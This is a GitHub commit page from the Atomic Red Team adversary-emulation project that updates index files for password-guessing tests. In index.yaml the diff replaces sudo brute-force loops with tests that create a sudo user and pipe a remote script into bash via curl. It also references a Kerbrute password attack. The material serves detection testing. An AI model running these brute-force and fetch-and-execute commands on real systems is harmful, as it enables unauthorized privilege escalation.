Skip to content

Commit

Permalink
Generated docs from job=generate-docs branch=master [ci skip]
Browse files Browse the repository at this point in the history
  • Loading branch information
Atomic Red Team doc generator committed Mar 17, 2023
1 parent 07deaa0 commit 96d11e0
Show file tree
Hide file tree
Showing 10 changed files with 244 additions and 221 deletions.

Large diffs are not rendered by default.

6 changes: 3 additions & 3 deletions atomics/Indexes/Indexes-CSV/index.csv
Original file line number Diff line number Diff line change
Expand Up @@ -1030,9 +1030,9 @@ credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,ae
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
Expand Down
4 changes: 2 additions & 2 deletions atomics/Indexes/Indexes-CSV/linux-index.csv
Original file line number Diff line number Diff line change
Expand Up @@ -173,8 +173,8 @@ credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to
credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
Expand Down
2 changes: 1 addition & 1 deletion atomics/Indexes/Indexes-CSV/windows-index.csv
Original file line number Diff line number Diff line change
Expand Up @@ -719,7 +719,7 @@ lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing R
credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
Expand Down
6 changes: 3 additions & 3 deletions atomics/Indexes/Indexes-Markdown/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -1676,9 +1676,9 @@
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
Expand Down
4 changes: 2 additions & 2 deletions atomics/Indexes/Indexes-Markdown/linux-index.md
Original file line number Diff line number Diff line change
Expand Up @@ -392,8 +392,8 @@
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
Expand Down
2 changes: 1 addition & 1 deletion atomics/Indexes/Indexes-Markdown/windows-index.md
Original file line number Diff line number Diff line change
Expand Up @@ -1195,7 +1195,7 @@
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
Expand Down
161 changes: 86 additions & 75 deletions atomics/Indexes/index.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -74960,81 +74960,6 @@ credential-access:
}
}
Write-Host "End of bruteforce"
- name: SUDO brute force Debian
auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
description: |
Attempts to sudo with current user using passwords from a list. Will run sudo 3 times, each with 3 different password attempts.
PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if running on a Debian based machine.

'
prereq_command: |
if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
get_prereq_command: 'apt-get update && apt-get install -y sudo

'
executor:
elevation_required: false
command: |
for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
echo done
cleanup_command: 'rm -f /tmp/asker /tmp/workingfile

'
name: sh
- name: SUDO brute force Redhat
auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
description: "Brute force the password of a local user account which is a member
of the sudo'ers group on a Redhat based Linux distribution. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if running on a Redhat based machine.

'
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
get_prereq_command: 'yum -y update && yum install -y openssl sudo

'
executor:
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
su target

PASSWORDS=(one two three password five); \
touch /tmp/file; \
for P in ${PASSWORDS[@]}; do \
date +"%b %d %T"; \
sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
echo "exit: $?"; \
if grep -q "root" /tmp/file; then \
echo "FOUND: sudo => $P"; break; \
else \
echo "TRIED: $P"; \
fi; \
sleep 2; \
done; \
rm /tmp/file
cleanup_command: 'userdel target

'
name: sh
- name: Password Brute User using Kerbrute Tool
auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
description: 'Bruteforce a single user''s password from a wordlist
Expand Down Expand Up @@ -75080,6 +75005,92 @@ credential-access:
elevation_required: false
command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller}
-d #{domain} $env:temp\\bruteuser.txt TestUser1 \n"
- name: SUDO Brute Force - Debian
auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
with no password) with a user that has sudo'ers privileges, but they do not
know the users password. Normally, failed attempts to access root will not
cause the root account to become locked, to prevent denial-of-service. This
functionality enables an attacker to undertake a local brute force password
guessing attack without locking out the root user. \n\nThis test creates the
\"art\" user with a password of \"password123\", logs in, downloads and executes
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: bash
dependencies:
- description: 'Check if running on a Debian based machine.

'
prereq_command: |
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: 'apt update && apt install -y openssl sudo curl

'
executor:
name: bash
elevation_required: true
command: |
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: 'userdel -fr art

'
- name: SUDO Brute Force - Redhat
auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
with no password) with a user that has sudo'ers privileges, but they do not
know the users password. Normally, failed attempts to access root will not
cause the root account to become locked, to prevent denial-of-service. This
functionality enables an attacker to undertake a local brute force password
guessing attack without locking out the root user. \n\nThis test creates the
\"art\" user with a password of \"password123\", logs in, downloads and executes
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: bash
dependencies:
- description: 'Check if running on a Redhat based machine.

'
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: 'yum update && yum install -y openssl sudo curl

'
executor:
name: bash
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: 'userdel -fr art

'
T1003:
technique:
x_mitre_platforms:
Expand Down
Loading

0 comments on commit 96d11e0

Please sign in to comment.